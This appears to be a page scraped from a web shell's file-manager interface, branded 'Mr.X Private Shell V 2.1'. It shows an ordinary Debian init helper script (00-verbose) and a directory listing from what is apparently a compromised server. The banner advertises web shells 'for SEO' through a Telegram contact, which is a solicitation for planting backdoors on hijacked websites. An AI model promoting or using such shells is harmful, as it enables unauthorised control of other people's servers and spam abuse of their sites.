__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
vlog_daemon_msg() {
if test x"${VERBOSE:-yes}" != x"no" ; then
log_daemon_msg "$@"
else
true
fi
}
vlog_begin_msg() {
if test x"${VERBOSE:-yes}" != x"no" ; then
log_begin_msg "$@"
else
true
fi
}
vlog_action_msg() {
if test x"${VERBOSE:-yes}" != x"no" ; then
log_action_msg "$@"
else
true
fi
}
vlog_action_begin_msg() {
if test x"${VERBOSE:-yes}" != x"no" ; then
log_action_begin_msg "$@"
else
true
fi
}
vlog_action_end_msg() {
if test x"${VERBOSE:-yes}" != x"no" ; then
log_action_end_msg "$@"
else
true
fi
}
vlog_end_msg() {
if test x"${VERBOSE:-yes}" != x"no" ; then
log_end_msg "$@"
else
return ${1:-1}
fi
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 00-verbose | File | 658 B | 0644 |
|
| 40-systemd | File | 3.17 KB | 0644 |
|
| 50-ubuntu-logging | File | 3.66 KB | 0644 |
|
| 99-plymouth | File | 531 B | 0644 |
|